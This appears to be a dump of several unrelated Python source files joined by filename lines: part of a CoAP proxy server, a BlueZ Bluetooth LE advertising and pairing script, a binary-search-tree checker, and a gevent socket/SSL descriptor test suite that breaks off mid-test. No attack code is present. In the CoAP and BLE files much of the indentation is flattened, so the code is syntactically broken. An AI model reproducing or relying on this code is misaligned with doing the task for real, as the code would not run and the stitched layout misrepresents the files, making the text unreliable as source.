        # simply forwards requests when no cache has been configured (a CacheLayer
        # instance can be assigned here to enable caching).
        self._cacheLayer = None
        self.resourceLayer = ResourceLayer(self)
# Resource directory
root = Resource('root', self, visible=False, observable=False, allow_children=True)
root.path = '/'
self.root = Tree()
self.root["/"] = root
self._serializer = None
self.server_address = server_address
self.multicast = multicast
self.file_xml = xml_file
self._mapping = {}
addrinfo = socket.getaddrinfo(self.server_address[0], None)[0]
if self.multicast: # pragma: no cover
# Create a socket
            self._socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind it to the port
self._socket.bind(('', self.server_address[1]))
            group_bin = socket.inet_pton(addrinfo[0], addrinfo[4][0])
# Join group
if addrinfo[0] == socket.AF_INET: # IPv4
mreq = group_bin + struct.pack('=I', socket.INADDR_ANY)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
else:
mreq = group_bin + struct.pack('@I', 0)
self._socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
else:
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(self.server_address)
self.parse_config()
def parse_config(self):
tree = ElementTree.parse(self.file_xml)
root = tree.getroot()
for server in root.findall('server'):
destination = server.text
name = server.get("name")
self.discover_remote(destination, name)
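    # Illustrative xml_file consumed by parse_config(); the root tag and the values are
    # hypothetical, but each <server> element must carry a "name" attribute and a
    # "host:port" text payload, matching the reads above:
    #
    #   <map>
    #     <server name="node1">127.0.0.1:5684</server>
    #     <server name="node2">192.168.1.10:5683</server>
    #   </map>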
def discover_remote(self, destination, name):
assert (isinstance(destination, str))
split = destination.split(":", 1)
host = split[0]
port = int(split[1])
server = (host, port)
client = HelperClient(server)
response = client.discover()
client.stop()
self.discover_remote_results(response, name)
def discover_remote_results(self, response, name):
host, port = response.source
if response.code == defines.Codes.CONTENT.number:
resource = Resource('server', self, visible=True, observable=False, allow_children=True)
self.add_resource(name, resource)
self._mapping[name] = (host, port)
self.parse_core_link_format(response.payload, name, (host, port))
else:
logger.error("Server: " + response.source + " isn't valid.")
def parse_core_link_format(self, link_format, base_path, remote_server):
while len(link_format) > 0:
pattern = "<([^>]*)>;"
result = re.match(pattern, link_format)
path = result.group(1)
path = path.split("/")
path = path[1:][0]
link_format = link_format[result.end(1) + 2:]
pattern = "([^<,])*"
result = re.match(pattern, link_format)
attributes = result.group(0)
dict_att = {}
if len(attributes) > 0:
attributes = attributes.split(";")
for att in attributes:
a = att.split("=")
# TODO check correctness
dict_att[a[0]] = a[1]
link_format = link_format[result.end(0) + 1:]
# TODO handle observing
resource = RemoteResource('server', remote_server, path, coap_server=self, visible=True, observable=False,
allow_children=True)
resource.attributes = dict_att
self.add_resource(base_path + "/" + path, resource)
logger.info(self.root.dump())
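    # Illustrative CoRE Link Format (RFC 6690) payload handled by the loop above;
    # paths and attributes are hypothetical. Each entry becomes a RemoteResource
    # registered under base_path:
    #
    #   </sensors/temp>;rt="temperature";if="sensor",</actuators/led>;rt="light"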
def purge(self):
while not self.stopped.isSet():
self.stopped.wait(timeout=defines.EXCHANGE_LIFETIME)
self._messageLayer.purge()
def listen(self, timeout=10):
"""
Listen for incoming messages. Timeout is used to check if the server must be switched off.
:param timeout: Socket Timeout in seconds
"""
self._socket.settimeout(float(timeout))
while not self.stopped.isSet():
try:
data, client_address = self._socket.recvfrom(4096)
except socket.timeout:
continue
try:
self.receive_datagram((data, client_address))
except RuntimeError:
print "Exception with Executor"
self._socket.close()
def close(self):
"""
Stop the server.
"""
logger.info("Stop server")
self.stopped.set()
for event in self.to_be_stopped:
event.set()
self._socket.close()
def receive_datagram(self, args):
"""
Receive datagram from the udp socket.
:rtype : Message
"""
data, client_address = args
serializer = Serializer()
message = serializer.deserialize(data, client_address)
if isinstance(message, int):
logger.error("receive_datagram - BAD REQUEST")
rst = Message()
rst.destination = client_address
rst.type = defines.Types["RST"]
rst.code = message
self.send_datagram(rst)
return
logger.debug("receive_datagram - " + str(message))
if isinstance(message, Request):
transaction = self._messageLayer.receive_request(message)
if transaction.request.duplicated and transaction.completed:
logger.debug("message duplicated,transaction completed")
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
elif transaction.request.duplicated and not transaction.completed:
logger.debug("message duplicated,transaction NOT completed")
self._send_ack(transaction)
return
transaction.separate_timer = self._start_separate_timer(transaction)
transaction = self._blockLayer.receive_request(transaction)
if transaction.block_transfer:
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
transaction = self._observeLayer.receive_request(transaction)
"""
call to the cache layer to check if there's a cached response for the request
if not, call the forward layer
"""
if self._cacheLayer is not None:
transaction = self._cacheLayer.receive_request(transaction)
if transaction.cacheHit is False:
                        logger.debug(transaction.request)
transaction = self._forwardLayer.receive_request(transaction)
                        logger.debug(transaction.response)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._cacheLayer.send_response(transaction)
else:
transaction = self._forwardLayer.receive_request(transaction)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
if transaction.response is not None:
if transaction.response.type == defines.Types["CON"]:
                    self._start_retransmission(transaction, transaction.response)
self.send_datagram(transaction.response)
elif isinstance(message, Message):
transaction = self._messageLayer.receive_empty(message)
if transaction is not None:
transaction = self._blockLayer.receive_empty(message, transaction)
self._observeLayer.receive_empty(message, transaction)
else: # pragma: no cover
logger.error("Received response from %s", message.source)
def send_datagram(self, message):
"""
:type message: Message
:param message:
"""
if not self.stopped.isSet():
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def add_resource(self, path, resource):
"""
Helper function to add resources to the resource directory during server initialization.
:type resource: Resource
:param resource:
"""
assert isinstance(resource, Resource)
path = path.strip("/")
paths = path.split("/")
actual_path = ""
i = 0
for p in paths:
i += 1
actual_path += "/" + p
try:
res = self.root[actual_path]
except KeyError:
res = None
if res is None:
if len(paths) != i:
return False
resource.path = actual_path
self.root[actual_path] = resource
return True
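    # Typical usage during server setup (the resource class and the mapping file name
    # are hypothetical; the constructor arguments follow __init__ above):
    #
    #   server = CoAP(("0.0.0.0", 5683), "proxy_mapping.xml")
    #   server.add_resource("hello/", HelloResource())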
    def _start_retransmission(self, transaction, message):
        """
        Start a retransmission thread for a confirmable (CON) message.
        :type transaction: Transaction
        :param transaction:
        :type message: Message
        :param message:
        """
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
if message.observe is not None:
self._observeLayer.remove_subscriber(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def _start_separate_timer(self, transaction):
"""
:type transaction: Transaction
:param transaction:
        :rtype : threading.Timer
"""
t = threading.Timer(defines.ACK_TIMEOUT, self._send_ack, (transaction,))
t.start()
return t
@staticmethod
def _stop_separate_timer(timer):
"""
        :type timer: threading.Timer
        :param timer: the timer to cancel
"""
timer.cancel()
def _send_ack(self, transaction):
# Handle separate
"""
Sends an ACK message for the request.
        :param transaction: the transaction whose request needs an empty ACK
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.request.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.request, ack)
self.send_datagram(ack)
|
gapAdvertise.py
|
#!/usr/bin/python
# SPDX-License-Identifier: LGPL-2.1-or-later
from __future__ import print_function
import argparse
import dbus
import dbus.exceptions
import dbus.mainloop.glib
import dbus.service
import time
import threading
try:
from gi.repository import GObject # python3
except ImportError:
import gobject as GObject # python2
mainloop = None
BLUEZ_SERVICE_NAME = 'org.bluez'
LE_ADVERTISING_MANAGER_IFACE = 'org.bluez.LEAdvertisingManager1'
DBUS_OM_IFACE = 'org.freedesktop.DBus.ObjectManager'
DBUS_PROP_IFACE = 'org.freedesktop.DBus.Properties'
LE_ADVERTISEMENT_IFACE = 'org.bluez.LEAdvertisement1'
class InvalidArgsException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.freedesktop.DBus.Error.InvalidArgs'
class NotSupportedException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.bluez.Error.NotSupported'
class NotPermittedException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.bluez.Error.NotPermitted'
class InvalidValueLengthException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.bluez.Error.InvalidValueLength'
class FailedException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.bluez.Error.Failed'
BUS_NAME = 'org.bluez'
AGENT_INTERFACE = 'org.bluez.Agent1'
AGENT_PATH = "/org/bluez/justWorks/agent"
AGENT_CAPABILITY = "NoInputNoOutput"
bus = None
device_obj = None
dev_path = None
def ask(prompt):
try:
return raw_input(prompt)
except:
return input(prompt)
def set_trusted(path):
props = dbus.Interface(bus.get_object("org.bluez", path),
"org.freedesktop.DBus.Properties")
props.Set("org.bluez.Device1", "Trusted", True)
def dev_connect(path):
dev = dbus.Interface(bus.get_object("org.bluez", path),
"org.bluez.Device1")
dev.Connect()
class Rejected(dbus.DBusException):
_dbus_error_name = "org.bluez.Error.Rejected"
def pair_reply():
print("Device paired")
set_trusted(dev_path)
dev_connect(dev_path)
mainloop.quit()
def pair_error(error):
err_name = error.get_dbus_name()
if err_name == "org.freedesktop.DBus.Error.NoReply" and device_obj:
print("Timed out. Cancelling pairing")
device_obj.CancelPairing()
else:
print("Creating device failed: %s" % (error))
def register_ad_cb():
print('Advertisement registered')
def register_ad_error_cb(error):
print('Failed to register advertisement: ' + str(error))
mainloop.quit()
def find_adapter(bus):
remote_om = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, '/'),
DBUS_OM_IFACE)
objects = remote_om.GetManagedObjects()
for o, props in objects.items():
if LE_ADVERTISING_MANAGER_IFACE in props:
return o
return None
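# find_adapter() returns the object path of the first BlueZ object that exposes
# LEAdvertisingManager1, typically the default adapter, e.g. '/org/bluez/hci0'
# (the exact path depends on the local BlueZ configuration).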
def shutdown(timeout):
print('Advertising for {} seconds...'.format(timeout))
time.sleep(timeout)
mainloop.quit()
class Agent(dbus.service.Object):
exit_on_release = True
def set_exit_on_release(self, exit_on_release):
self.exit_on_release = exit_on_release
@dbus.service.method(AGENT_INTERFACE,
in_signature="", out_signature="")
def Release(self):
print("Release")
if self.exit_on_release:
mainloop.quit()
@dbus.service.method(AGENT_INTERFACE,
in_signature="os", out_signature="")
def AuthorizeService(self, device, uuid):
print("AuthorizeService (%s, %s)" % (device, uuid))
authorize = ask("Authorize connection (yes/no): ")
if (authorize == "yes"):
return
raise Rejected("Connection rejected by user")
@dbus.service.method(AGENT_INTERFACE,
in_signature="o", out_signature="s")
def RequestPinCode(self, device):
print("RequestPinCode (%s)" % (device))
set_trusted(device)
return ask("Enter PIN Code: ")
@dbus.service.method(AGENT_INTERFACE,
in_signature="o", out_signature="u")
def RequestPasskey(self, device):
print("RequestPasskey (%s)" % (device))
set_trusted(device)
passkey = ask("Enter passkey: ")
return dbus.UInt32(passkey)
@dbus.service.method(AGENT_INTERFACE,
in_signature="ouq", out_signature="")
def DisplayPasskey(self, device, passkey, entered):
print("DisplayPasskey (%s, %06u entered %u)" %
(device, passkey, entered))
@dbus.service.method(AGENT_INTERFACE,
in_signature="os", out_signature="")
def DisplayPinCode(self, device, pincode):
print("DisplayPinCode (%s, %s)" % (device, pincode))
@dbus.service.method(AGENT_INTERFACE,
in_signature="ou", out_signature="")
def RequestConfirmation(self, device, passkey):
print("RequestConfirmation (%s, %06d)" % (device, passkey))
confirm = ask("Confirm passkey (yes/no): ")
if (confirm == "yes"):
set_trusted(device)
return
raise Rejected("Passkey doesn't match")
@dbus.service.method(AGENT_INTERFACE,
in_signature="o", out_signature="")
def RequestAuthorization(self, device):
print("RequestAuthorization (%s)" % (device))
auth = ask("Authorize? (yes/no): ")
if (auth == "yes"):
return
raise Rejected("Pairing rejected")
@dbus.service.method(AGENT_INTERFACE,
in_signature="", out_signature="")
def Cancel(self):
print("Cancel")
class Advertisement(dbus.service.Object):
PATH_BASE = '/org/bluez/example/advertisement'
def __init__(self, bus, index, advertising_type):
self.path = self.PATH_BASE + str(index)
self.bus = bus
self.ad_type = advertising_type
self.service_uuids = None
self.manufacturer_data = None
self.solicit_uuids = None
self.service_data = None
self.local_name = None
self.include_tx_power = False
self.data = None
dbus.service.Object.__init__(self, bus, self.path)
def get_properties(self):
properties = dict()
properties['Type'] = self.ad_type
if self.service_uuids is not None:
properties['ServiceUUIDs'] = dbus.Array(self.service_uuids,
signature='s')
if self.solicit_uuids is not None:
properties['SolicitUUIDs'] = dbus.Array(self.solicit_uuids,
signature='s')
if self.manufacturer_data is not None:
properties['ManufacturerData'] = dbus.Dictionary(
self.manufacturer_data, signature='qv')
if self.service_data is not None:
properties['ServiceData'] = dbus.Dictionary(self.service_data,
signature='sv')
if self.local_name is not None:
properties['LocalName'] = dbus.String(self.local_name)
properties['Appearance'] = dbus.UInt16(961)
properties['Discoverable'] = dbus.Boolean(True)
properties['DiscoverableTimeout'] = dbus.UInt16(0)
if self.include_tx_power:
properties['Includes'] = dbus.Array(["tx-power"], signature='s')
if self.data is not None:
properties['Data'] = dbus.Dictionary(
self.data, signature='yv')
return {LE_ADVERTISEMENT_IFACE: properties}
def get_path(self):
return dbus.ObjectPath(self.path)
def add_service_uuid(self, uuid):
if not self.service_uuids:
self.service_uuids = []
self.service_uuids.append(uuid)
def add_solicit_uuid(self, uuid):
if not self.solicit_uuids:
self.solicit_uuids = []
self.solicit_uuids.append(uuid)
def add_manufacturer_data(self, manuf_code, data):
if not self.manufacturer_data:
self.manufacturer_data = dbus.Dictionary({}, signature='qv')
self.manufacturer_data[manuf_code] = dbus.Array(data, signature='y')
def add_service_data(self, uuid, data):
if not self.service_data:
self.service_data = dbus.Dictionary({}, signature='sv')
self.service_data[uuid] = dbus.Array(data, signature='y')
def add_local_name(self, name):
if not self.local_name:
self.local_name = ""
self.local_name = dbus.String(name)
def add_data(self, ad_type, data):
if not self.data:
self.data = dbus.Dictionary({}, signature='yv')
self.data[ad_type] = dbus.Array(data, signature='y')
@dbus.service.method(DBUS_PROP_IFACE,
in_signature='s',
out_signature='a{sv}')
def GetAll(self, interface):
print('GetAll')
if interface != LE_ADVERTISEMENT_IFACE:
raise InvalidArgsException()
print('returning props')
return self.get_properties()[LE_ADVERTISEMENT_IFACE]
@dbus.service.method(LE_ADVERTISEMENT_IFACE,
in_signature='',
out_signature='')
def Release(self):
print('%s: Released!' % self.path)
class TestAdvertisement(Advertisement):
def __init__(self, bus, index):
Advertisement.__init__(self, bus, index, 'peripheral')
#self.add_service_uuid('180D')
#self.add_service_uuid('180F')
#self.add_manufacturer_data(0xffff, [0x00, 0x01, 0x02, 0x03])
#self.add_service_data('9999', [0x00, 0x01, 0x02, 0x03, 0x04])
self.add_local_name('TestAdvertisement')
self.include_tx_power = True
#self.add_data(0x26, [0x01, 0x01, 0x00])
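# A minimal sketch of another Advertisement subclass built on the same helpers
# (the service UUID is the standard Battery Service and 0xFFFF is the reserved test
# company ID, so both are illustrative rather than required):
#
#   class BatteryAdvertisement(Advertisement):
#       def __init__(self, bus, index):
#           Advertisement.__init__(self, bus, index, 'peripheral')
#           self.add_service_uuid('180F')                     # Battery Service
#           self.add_manufacturer_data(0xFFFF, [0x01, 0x02])  # test company ID
#           self.add_local_name('BatteryAdvertisement')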
def main(timeout=0):
    # The Agent callbacks (set_trusted/dev_connect) rely on the module-level bus.
    global mainloop, bus
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
adapter = find_adapter(bus)
if not adapter:
print('LEAdvertisingManager1 interface not found')
return
path = AGENT_PATH
capability = AGENT_CAPABILITY
agent = Agent(bus, path)
    obj = bus.get_object(BUS_NAME, "/org/bluez")
manager = dbus.Interface(obj, "org.bluez.AgentManager1")
manager.RegisterAgent(path, capability)
manager.RequestDefaultAgent(path)
print("Agent registered")
adapter_props = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, adapter),
"org.freedesktop.DBus.Properties")
adapter_props.Set("org.bluez.Adapter1", "Powered", dbus.Boolean(1))
ad_manager = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, adapter),
LE_ADVERTISING_MANAGER_IFACE)
test_advertisement = TestAdvertisement(bus, 0)
mainloop = GObject.MainLoop()
ad_manager.RegisterAdvertisement(test_advertisement.get_path(), {},
reply_handler=register_ad_cb,
error_handler=register_ad_error_cb)
if timeout > 0:
threading.Thread(target=shutdown, args=(timeout,)).start()
else:
print('Advertising forever...')
mainloop.run() # blocks until mainloop.quit() is called
ad_manager.UnregisterAdvertisement(test_advertisement)
print('Advertisement unregistered')
dbus.service.Object.remove_from_connection(test_advertisement)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--timeout', default=0, type=int, help="advertise " +
"for this many seconds then stop, 0=run forever " +
"(default: 0)")
args = parser.parse_args()
main(args.timeout)
|
is_bst_hard.py
|
#!/usr/bin/python3
import sys
import threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**25) # new thread will get stack of such size
class Tree(object):
def read(self):
self.n = int(sys.stdin.readline())
# Case: empty tree:
if self.n == 0:
self.key = [0]
self.left = [-1]
self.right = [-1]
else:
self.key = [0 for i in range(self.n)]
self.left = [0 for i in range(self.n)]
self.right = [0 for i in range(self.n)]
for i in range(self.n):
[a, b, c] = map(int, sys.stdin.readline().split())
self.key[i] = a
self.left[i] = b
self.right[i] = c
def in_order(self):
self.result = []
self.in_order_recurse(0)
return self.result
def in_order_recurse(self, root):
if self.left[root] != -1:
# If the left child is ever >= the parent, raise an Exception.
if self.key[self.left[root]] >= self.key[root]:
raise Exception('NOT A BST!')
self.in_order_recurse(self.left[root])
self.result.append(self.key[root])
if self.right[root] != -1:
self.in_order_recurse(self.right[root])
def is_binary_search_tree(self):
        # If in_order() returns a sorted sequence (and no ordering violation was
        # raised during the traversal), then the tree is a valid BST.
try:
in_order = self.in_order()
in_order_sort = sorted(in_order)
if in_order == in_order_sort:
return True
else:
return False
        except Exception:
return False
def main():
tree = Tree()
tree.read()
if tree.is_binary_search_tree():
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target=main).start()
|
test__makefile_ref.py
|
from __future__ import print_function
import os
from gevent import monkey; monkey.patch_all()
import socket
import ssl
import threading
import unittest
import errno
import weakref
import gevent.testing as greentest
dirname = os.path.dirname(os.path.abspath(__file__))
certfile = os.path.join(dirname, '2_7_keycert.pem')
pid = os.getpid()
PY3 = greentest.PY3
PYPY = greentest.PYPY
CPYTHON = not PYPY
PY2 = not PY3
fd_types = int
if PY3:
long = int
fd_types = (int, long)
WIN = greentest.WIN
from gevent.testing import get_open_files
try:
import psutil
except ImportError:
psutil = None
class Test(greentest.TestCase):
extra_allowed_open_states = ()
def tearDown(self):
self.extra_allowed_open_states = ()
super(Test, self).tearDown()
def assert_raises_EBADF(self, func):
try:
result = func()
except (socket.error, OSError) as ex:
# Windows/Py3 raises "OSError: [WinError 10038]"
if ex.args[0] == errno.EBADF:
return
if WIN and ex.args[0] == 10038:
return
raise
raise AssertionError('NOT RAISED EBADF: %r() returned %r' % (func, result))
def assert_fd_open(self, fileno):
assert isinstance(fileno, fd_types)
open_files = get_open_files()
if fileno not in open_files:
raise AssertionError('%r is not open:\n%s' % (fileno, open_files['data']))
def assert_fd_closed(self, fileno):
assert isinstance(fileno, fd_types), repr(fileno)
assert fileno > 0, fileno
open_files = get_open_files()
if fileno in open_files:
raise AssertionError('%r is not closed:\n%s' % (fileno, open_files['data']))
def _assert_sock_open(self, sock):
# requires the psutil output
open_files = get_open_files()
sockname = sock.getsockname()
for x in open_files['data']:
if getattr(x, 'laddr', None) == sockname:
assert x.status in (psutil.CONN_LISTEN, psutil.CONN_ESTABLISHED) + self.extra_allowed_open_states, x.status
return
raise AssertionError("%r is not open:\n%s" % (sock, open_files['data']))
def assert_open(self, sock, *rest):
if isinstance(sock, fd_types):
if not WIN:
self.assert_fd_open(sock)
else:
fileno = sock.fileno()
assert isinstance(fileno, fd_types), fileno
sockname = sock.getsockname()
assert isinstance(sockname, tuple), sockname
if not WIN:
self.assert_fd_open(fileno)
else:
self._assert_sock_open(sock)
if rest:
self.assert_open(rest[0], *rest[1:])
def assert_closed(self, sock, *rest):
if isinstance(sock, fd_types):
self.assert_fd_closed(sock)
else:
# Under Python3, the socket module returns -1 for a fileno
# of a closed socket; under Py2 it raises
if PY3:
self.assertEqual(sock.fileno(), -1)
else:
self.assert_raises_EBADF(sock.fileno)
self.assert_raises_EBADF(sock.getsockname)
self.assert_raises_EBADF(sock.accept)
if rest:
self.assert_closed(rest[0], *rest[1:])
def make_open_socket(self):
s = socket.socket()
s.bind(('127.0.0.1', 0))
self._close_on_teardown(s)
if WIN or greentest.LINUX:
            # Windows and Linux (with psutil) don't show the socket as open until
            # we call listen() (Linux with lsof accepts either).
s.listen(1)
self.assert_open(s, s.fileno())
return s
if CPYTHON and PY2:
# Keeping raw sockets alive keeps SSL sockets
# from being closed too, at least on CPython2, so we
# need to use weakrefs.
# In contrast, on PyPy, *only* having a weakref lets the
# original socket die and leak
def _close_on_teardown(self, resource):
self.close_on_teardown.append(weakref.ref(resource))
return resource
def _tearDownCloseOnTearDown(self):
self.close_on_teardown = [r() for r in self.close_on_teardown if r() is not None]
super(Test, self)._tearDownCloseOnTearDown()
# Sometimes it's this one, sometimes it's test_ssl. No clue why or how.
@greentest.skipOnAppVeyor("This sometimes times out for no apparent reason.")
class TestSocket(Test):
def test_simple_close(self):
s = self.make_open_socket()
fileno = s.fileno()
s.close()
self.assert_closed(s, fileno)
def test_makefile1(self):
s = self.make_open_socket()
fileno = s.fileno()
f = s.makefile()
self.assert_open(s, fileno)
s.close()
# Under python 2, this closes socket wrapper object but not the file descriptor;
# under python 3, both stay open
if PY3:
self.assert_open(s, fileno)
else:
self.assert_closed(s)
self.assert_open(fileno)
f.close()
self.assert_closed(s)
self.assert_closed(fileno)
def test_makefile2(self):
s = self.make_open_socket()
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s)
self.assert_open(s, fileno)
f.close()
# closing fileobject does not close the socket
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_server_simple(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket)
finally:
t.join()
listener.close()
connector.close()
def test_server_makefile1(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
# Under python 2, this closes socket wrapper object but not the file descriptor;
# under python 3, both stay open
if PY3:
self.assert_open(client_socket, fileno)
else:
self.assert_closed(client_socket)
self.assert_open(fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
connector.close()
def test_server_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
# closing fileobject does not close the socket
f.close()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
connector.close()
@greentest.skipOnAppVeyor("This sometimes times out for no apparent reason.")
class TestSSL(Test):
def _ssl_connect_task(self, connector, port):
connector.connect(('127.0.0.1', port))
try:
# Note: We get ResourceWarning about 'x'
# on Python 3 if we don't join the spawned thread
x = ssl.wrap_socket(connector)
except socket.error:
# Observed on Windows with PyPy2 5.9.0 and libuv:
# if we don't switch in a timely enough fashion,
# the server side runs ahead of us and closes
# our socket first, so this fails.
pass
else:
#self._close_on_teardown(x)
x.close()
def _make_ssl_connect_task(self, connector, port):
t = threading.Thread(target=self._ssl_connect_task, args=(connector, port))
t.daemon = True
return t
def __cleanup(self, task, *sockets):
# workaround for test_server_makefile1, test_server_makefile2,
# test_server_simple, test_serverssl_makefile1.
# On PyPy on Linux, it is important to join the SSL Connect
# Task FIRST, before closing the sockets. If we do it after
# (which makes more sense) we hang. It's not clear why, except
# that it has something to do with context switches. Inserting a call to
# gevent.sleep(0.1) instead of joining the task has the same
# effect. If the previous tests hang, then later tests can fail with
# SSLError: unknown alert type.
# XXX: Why do those two things happen?
# On PyPy on macOS, we don't have that problem and can use the
# more logical order.
task.join()
for s in sockets:
s.close()
del sockets
del task
def test_simple_close(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
self._close_on_teardown(s)
fileno = s.fileno()
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_makefile1(self):
raw_s = self.make_open_socket()
s = ssl.wrap_socket(raw_s)
self._close_on_teardown(s)
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s, fileno)
s.close()
self.assert_open(s, fileno)
f.close()
raw_s.close()
self.assert_closed(s, fileno)
def test_makefile2(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
self._close_on_teardown(s)
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s, fileno)
f.close()
# closing fileobject does not close the socket
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_server_simple(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
t = self._make_ssl_connect_task(connector, port)
t.start()
try:
client_socket, _addr = listener.accept()
self._close_on_teardown(client_socket.close)
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
self._close_on_teardown(client_socket)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, listener, connector)
def test_server_makefile1(self):
listener = socket.socket()
self._close_on_teardown(listener)
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
t = self._make_ssl_connect_task(connector, port)
t.start()
try:
client_socket, _addr = listener.accept()
self._close_on_teardown(client_socket.close) # hard ref
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
self._close_on_teardown(client_socket)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_open(client_socket, fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, listener, connector)
def test_server_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
t = self._make_ssl_connect_task(connector, port)
t.start()
try:
client_socket, _addr = listener.accept()
self._close_on_teardown(client_socket)
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
self._close_on_teardown(client_socket)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
# Closing fileobject does not close SSLObject
f.close()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, connector, listener, client_socket)
def test_serverssl_makefile1(self):
listener = socket.socket()
fileno = listener.fileno()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
self._close_on_teardown(listener)
listener = ssl.wrap_socket(listener, keyfile=certfile, certfile=certfile)
connector = socket.socket()
self._close_on_teardown(connector)
t = self._make_ssl_connect_task(connector, port)
t.start()
try:
